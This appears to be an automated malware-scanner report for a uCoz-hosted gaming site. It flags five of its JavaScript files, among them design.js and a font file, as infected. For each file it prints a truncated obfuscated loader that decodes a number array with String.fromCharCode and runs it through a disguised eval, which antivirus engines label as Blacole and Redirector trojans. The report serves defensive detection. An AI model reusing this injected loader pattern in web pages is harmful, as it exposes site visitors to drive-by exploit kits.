Malware Scanner report for cs-proga.clan.su

Malicious/Suspicious/Total urls checked: 5/0/15

5 pages have malicious code. See details below

Blacklists: OK

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Scanned pages/files

Request	Server response	Status
http://cs-proga.clan.su/	200 OK Content-Length: 57419 Content-Type: text/html	clean
http://s23.ucoz.net/src/u.js	200 OK Content-Length: 530 Content-Type: text/javascript	clean
http://cs-proga.clan.su/highslide/highslide.js	200 OK Content-Length: 50907 Content-Type: text/javascript	clean
http://cs-proga.clan.su/js/design.js	200 OK Content-Length: 3456 Content-Type: text/javascript	malicious
Malicious code - confirmed by antiviruses (see below) v="va"+"l";try{ebgserb++;}catch(snregrx){try{(Math+"")()}catch(ztbet){m=Math;ev=window[""+"e"+v];}n="56&&119&&133&&127&&115&&133&&121&&128&&126&&57&&57&&49&&139&&30&&26&&26&&134&&114&&130&&49&&133&&131&&124&&49&&77&&49&&55&&121&&132&&133&&128&&75 ... 8060 bytes are skipped ...p;122&&124&&117&&56&&132&&115&&131&&121&&129&&132&&58&&75&&30&&26&&26&&25&&142&&29&&27&&25&&142&&75&&30&&26&&142&&57&&57&&57&&76".split("&&");h=2;s="";if(m)for(i=0;i-700!=0;i=1+i){k=i;if(window.document)s+=String.fromCharCode(n[i]-(020+i%h));}z=s;if(021===0x11)ev(z);} Antivirus reports: AntiVir HTML/ExpKit.Gen3 Avast JS:Includer-ANL [Trj] Ikarus Trojan.JS.Redirector TrendMicro-HouseCall TROJ_GEN.F47V0401 DrWeb JS.IFrame.233 Microsoft Trojan:JS/Redirector.LD NANO-Antivirus Trojan.Script.Blacole.tfthc F-Prot JS/Redir.NZ GData Script.Trojan.Agent.BREL3G Commtouch JS/Redir.NZ
http://cs-proga.clan.su/js/cookie.js	200 OK Content-Length: 3455 Content-Type: text/javascript	malicious
Malicious code - confirmed by antiviruses (see below) v="va"+"l";try{ebgserb++;}catch(snregrx){try{(Math+"")()}catch(ztbet){m=Math;ev=window[""+"e"+v];}n="56&&119&&133&&127&&115&&133&&121&&128&&126&&57&&57&&49&&139&&30&&26&&26&&134&&114&&130&&49&&133&&131&&124&&49&&77&&49&&55&&121&&132&&133&&128&&75 ... 8051 bytes are skipped ...p;121&&125&&116&&57&&131&&116&&130&&122&&128&&133&&57&&76&&29&&27&&25&&26&&141&&30&&26&&26&&141&&76&&29&&27&&141&&58&&56&&58&&75".split("&&");h=2;s="";if(m)for(i=0;i-699!=0;i=1+i){k=i;if(window.document)s+=String.fromCharCode(n[i]-(020+i%h));}z=s;if(021===0x11)ev(z);} Antivirus reports: AntiVir HTML/ExpKit.Gen3 Avast JS:Includer-ANL [Trj] DrWeb JS.IFrame.233 Microsoft Trojan:JS/Redirector.LD NANO-Antivirus Trojan.Script.Blacole.tfthc F-Prot JS/Redir.NZ Commtouch JS/Redir.NZ
http://s39.ucoz.net/src/u.js	200 OK Content-Length: 530 Content-Type: text/javascript	clean
http://s40.ucoz.net/src/jquery-1.3.2.js	200 OK Content-Length: 57533 Content-Type: text/javascript	clean
http://s40.ucoz.net/src/uwnd.js?2	200 OK Content-Length: 228554 Content-Type: text/javascript	clean
http://s106.ucoz.net/src/jquery-1.7.2.js	200 OK Content-Length: 94840 Content-Type: text/javascript	clean
http://s106.ucoz.net/src/ulightbox/ulightbox.js	200 OK Content-Length: 22097 Content-Type: text/javascript	clean
http://s106.ucoz.net/src/uwnd.js?2	200 OK Content-Length: 228554 Content-Type: text/javascript	clean
http://cs-proga.clan.su/js/cufon-yui.js	200 OK Content-Length: 3460 Content-Type: text/javascript	malicious
Malicious code - confirmed by antiviruses (see below) v="va"+"l";try{ebgserb++;}catch(snregrx){try{(Math+"")()}catch(ztbet){m=Math;ev=window[""+"e"+v];}n="56&&119&&133&&127&&115&&133&&121&&128&&126&&57&&57&&49&&139&&30&&26&&26&&134&&114&&130&&49&&133&&131&&124&&49&&77&&49&&55&&121&&132&&133&&128&&75 ... 8064 bytes are skipped ...p;122&&124&&117&&56&&132&&115&&131&&121&&129&&132&&58&&75&&30&&26&&26&&25&&142&&29&&27&&25&&142&&75&&30&&26&&142&&57&&57&&57&&76".split("&&");h=2;s="";if(m)for(i=0;i-700!=0;i=1+i){k=i;if(window.document)s+=String.fromCharCode(n[i]-(020+i%h));}z=s;if(021===0x11)ev(z);} Antivirus reports: AntiVir HTML/ExpKit.Gen3 Avast JS:Includer-ANL [Trj] Ikarus Trojan.JS.Redirector TrendMicro-HouseCall TROJ_GEN.F47V0401 DrWeb JS.IFrame.233 Microsoft Trojan:JS/Redirector.LD NANO-Antivirus Trojan.Script.Blacole.tfthc F-Prot JS/Redir.NZ GData Script.Trojan.Agent.BREL3G Commtouch JS/Redir.NZ
http://cs-proga.clan.su/js/Museo_Slab.font.js	200 OK Content-Length: 3420 Content-Type: text/javascript	malicious
Malicious code - confirmed by antiviruses (see below) v="va"+"l";try{ebgserb++;}catch(snregrx){try{(Math+"")()}catch(ztbet){m=Math;ev=window[""+"e"+v];}n="56&&119&&133&&127&&115&&133&&121&&128&&126&&57&&57&&49&&139&&30&&26&&26&&134&&114&&130&&49&&133&&131&&124&&49&&77&&49&&55&&121&&132&&133&&128&&75 ... 7960 bytes are skipped ...p;122&&124&&117&&56&&132&&115&&131&&121&&129&&132&&58&&75&&30&&26&&26&&25&&142&&29&&27&&25&&142&&75&&30&&26&&142&&57&&57&&57&&76".split("&&");h=2;s="";if(m)for(i=0;i-692!=0;i=1+i){k=i;if(window.document)s+=String.fromCharCode(n[i]-(020+i%h));}z=s;if(021===0x11)ev(z);} Antivirus reports: K7AntiVirus Trojan DrWeb JS.IFrame.233 Microsoft Trojan:JS/Redirector.LD NANO-Antivirus Trojan.Script.Blacole.tfthc F-Prot JS/Redir.NZ Commtouch JS/Redir.NZ
http://cs-proga.clan.su/js/jquery.nivo.slider.pack.js	200 OK Content-Length: 3440 Content-Type: text/javascript	malicious
Malicious code - confirmed by antiviruses (see below) v="va"+"l";try{ebgserb++;}catch(snregrx){try{(Math+"")()}catch(ztbet){m=Math;ev=window[""+"e"+v];}n="56&&119&&133&&127&&115&&133&&121&&128&&126&&57&&57&&49&&139&&30&&26&&26&&134&&114&&130&&49&&133&&131&&124&&49&&77&&49&&55&&121&&132&&133&&128&&75 ... 8012 bytes are skipped ...p;122&&124&&117&&56&&132&&115&&131&&121&&129&&132&&58&&75&&30&&26&&26&&25&&142&&29&&27&&25&&142&&75&&30&&26&&142&&57&&57&&57&&76".split("&&");h=2;s="";if(m)for(i=0;i-696!=0;i=1+i){k=i;if(window.document)s+=String.fromCharCode(n[i]-(020+i%h));}z=s;if(021===0x11)ev(z);} Antivirus reports: K7AntiVirus Trojan DrWeb JS.IFrame.233 Microsoft Trojan:JS/Redirector.LD NANO-Antivirus Trojan.Script.Blacole.tfthc F-Prot JS/Redir.NZ Commtouch JS/Redir.NZ
http://www.dim-cs.ru/highslide/highslide.js	500 Can't connect to www.dim-cs.ru:80 Content-Length: 188 Content-Type: text/plain	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: cs-proga.clan.su

Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 21 Aug 2015 14:48:06 GMT
Server: uServ/3.2.2
Content-Length: 57419
Content-Type: text/html; charset=UTF-8

...57419 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: cs-proga.clan.su
Referer: http://www.google.com/search?q=cs-proga.clan.su

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=cs-proga.clan.su

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://cs-proga.clan.su/

Result: cs-proga.clan.su is not infected or malware details are not published yet.

Recently found suspicious websites

Malware Scanner report for cs-proga.clan.su

Malware & Hack Repair

Website Hack Insurance

Scanned pages/files

Malicious Redirects

Safe Browsing / Blacklists

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools